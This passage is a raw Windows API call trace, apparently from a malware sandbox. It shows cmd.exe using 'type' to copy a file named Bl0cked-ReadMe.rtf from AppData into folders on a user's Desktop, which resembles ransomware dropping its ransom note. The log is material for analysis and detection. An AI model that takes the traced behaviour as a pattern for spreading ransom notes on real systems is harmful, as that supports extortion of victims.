(_String1="KEYS", _String2="CD") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0136.346] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0136.346] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0136.346] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0136.346] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 
[0136.346] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0136.346] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x2ef948 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.346] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", nBufferLength=0x104, lpBuffer=0x2ef948, lpFilePart=0x2ef944 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop", lpFilePart=0x2ef944*="Desktop") returned 0x18 [0136.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] FindFirstFileW (in: lpFileName="C:\\Users\\EEBsYm5\\Desktop", lpFindFileData=0x2ef6c4 | out: lpFindFileData=0x2ef6c4) returned 0xb0038 [0136.347] FindClose (in: hFindFile=0xb0038 | out: hFindFile=0xb0038) returned 1 [0136.347] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 0x11 [0136.347] SetCurrentDirectoryW (lpPathName="C:\\Users\\EEBsYm5\\Desktop" (normalized: "c:\\users\\eebsym5\\desktop")) returned 1 [0136.347] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\EEBsYm5\\Desktop") returned 1 [0136.347] GetEnvironmentStringsW () returned 0xb2b18* [0136.348] FreeEnvironmentStringsW (penv=0xb2b18) returned 1 [0136.348] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.348] GetConsoleOutputCP () returned 0x1b5 [0136.369] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x4a9e4260 | out: lpCPInfo=0x4a9e4260) returned 1 
[0136.369] GetUserDefaultLCID () returned 0x409 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x4a9e4950, cchData=8 | out: lpLCData=":") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x2efa88, cchData=128 | out: lpLCData="0") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x2efa88, cchData=128 | out: lpLCData="0") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x2efa88, cchData=128 | out: lpLCData="1") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x4a9e4940, cchData=8 | out: lpLCData="/") returned 2 [0136.374] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x4a9e4d80, cchData=32 | out: lpLCData="Mon") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x4a9e4d40, cchData=32 | out: lpLCData="Tue") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x4a9e4d00, cchData=32 | out: lpLCData="Wed") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x4a9e4cc0, cchData=32 | out: lpLCData="Thu") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x4a9e4c80, cchData=32 | out: lpLCData="Fri") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x4a9e4c40, cchData=32 | out: lpLCData="Sat") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x4a9e4c00, cchData=32 | out: lpLCData="Sun") returned 4 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x4a9e4930, cchData=8 | out: lpLCData=".") returned 2 [0136.375] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x4a9e4920, cchData=8 | out: lpLCData=",") returned 2 [0136.375] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0136.376] GetConsoleTitleW (in: lpConsoleTitle=0xa08f8, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0136.391] 
GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x76910000 [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="CopyFileExW") returned 0x7694ac6c [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="IsDebuggerPresent") returned 0x76953ea8 [0136.391] GetProcAddress (hModule=0x76910000, lpProcName="SetConsoleInputExeNameW") returned 0x76962732 [0136.392] _wcsicmp (_String1="type", _String2=")") returned 75 [0136.392] _wcsicmp (_String1="FOR", _String2="type") returned -14 [0136.392] _wcsicmp (_String1="FOR/?", _String2="type") returned -14 [0136.392] _wcsicmp (_String1="IF", _String2="type") returned -11 [0136.392] _wcsicmp (_String1="IF/?", _String2="type") returned -11 [0136.392] _wcsicmp (_String1="REM", _String2="type") returned -2 [0136.392] _wcsicmp (_String1="REM/?", _String2="type") returned -2 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0136.396] GetFileType (hFile=0x7) returned 0x2 [0136.461] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0136.461] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x2ef980 | out: lpMode=0x2ef980) returned 1 [0136.462] _dup (_FileHandle=1) returned 3 [0136.463] _close (_FileHandle=1) returned 0 [0136.465] _wcsicmp (_String1="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf", _String2="con") returned -53 [0136.465] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Desktop\\Lp6Y\\hqVibu00\\u7E2T\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\desktop\\lp6y\\hqvibu00\\u7e2t\\bl0cked-readme.rtf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x2ef950, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x4c [0136.466] _open_osfhandle (_OSFileHandle=0x4c, _Flags=8) returned 1 [0136.467] GetConsoleTitleW (in: lpConsoleTitle=0x2ef780, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b 
[0136.467] _wcsicmp (_String1="type", _String2="DIR") returned 16 [0136.467] _wcsicmp (_String1="type", _String2="ERASE") returned 15 [0136.467] _wcsicmp (_String1="type", _String2="DEL") returned 16 [0136.467] _wcsicmp (_String1="type", _String2="TYPE") returned 0 [0136.468] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4a9e5260 | out: lpBuffer="C:\\Users\\EEBsYm5\\Desktop") returned 0x18 [0136.468] FindFirstFileExW (in: lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF", fInfoLevelId=0x1, lpFindFileData=0x2ef2e4, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x2ef2e4) returned 0xa0ea0 [0136.468] _wcsicmp (_String1="BL0CKE~1.RTF", _String2=".") returned 52 [0136.468] _wcsicmp (_String1="BL0CKE~1.RTF", _String2="..") returned 52 [0136.468] GetFileAttributesW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\BL0CKE~1.RTF" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cke~1.rtf")) returned 0x2020 [0136.468] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\AppData\\Roaming\\Bl0cked-ReadMe.rtf" (normalized: "c:\\users\\eebsym5\\appdata\\roaming\\bl0cked-readme.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x2ee1f0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x54 [0136.468] _open_osfhandle (_OSFileHandle=0x54, _Flags=8) returned 4 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] GetFileType (hFile=0x54) returned 0x1 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] GetFileSize (in: hFile=0x54, lpFileSizeHigh=0x2ee248 | out: lpFileSizeHigh=0x2ee248*=0x0) returned 0x1632 [0136.468] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.468] SetFilePointer (in: hFile=0x54, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0136.469] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.469] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, 
nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] GetFileType (hFile=0x4c) returned 0x1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] GetFileType (hFile=0x4c) returned 0x1 [0136.469] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.469] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 
0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] GetFileType (hFile=0x4c) returned 0x1 [0136.470] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.470] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.471] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.471] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) 
returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] GetFileType (hFile=0x4c) returned 0x1 [0136.471] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.471] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle 
(_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.472] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.472] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, 
lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] GetFileType (hFile=0x4c) returned 0x1 [0136.472] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.472] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.473] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.473] ReadFile 
(in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] 
_get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] GetFileType (hFile=0x4c) returned 0x1 [0136.473] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.473] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef260*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef260*, lpNumberOfBytesWritten=0x2ee264*=0x20, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.474] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2ee250 | out: lpNewFilePointer=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=4) returned 0x54 [0136.474] ReadFile (in: hFile=0x54, lpBuffer=0x2ef080, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x2ee270, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, lpNumberOfBytesRead=0x2ee270*=0x200, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef080*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef080*, 
lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef0d0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef0d0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef120*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef120*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef170*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef170*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef1c0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef1c0*, lpNumberOfBytesWritten=0x2ee264*=0x50, lpOverlapped=0x0) returned 1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] GetFileType (hFile=0x4c) returned 0x1 [0136.474] _get_osfhandle (_FileHandle=1) returned 0x4c [0136.474] WriteFile (in: hFile=0x4c, lpBuffer=0x2ef210*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x2ee264, lpOverlapped=0x0 | out: lpBuffer=0x2ef210*, lpNumberOfBytesWritten=0x2ee264*=0x50, 
